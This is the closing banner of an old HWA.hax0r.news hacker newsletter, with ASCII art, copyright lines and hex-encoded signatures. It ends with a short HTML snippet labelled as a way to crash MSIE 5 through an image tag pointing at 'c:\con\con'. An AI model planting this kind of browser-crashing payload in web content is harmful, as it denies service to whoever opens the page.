    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]    



<HTML>
<BODY>
Crashing your MSIE 5 browser:
<IMG SRC="c:\con\con">
</BODY>
</HTML>

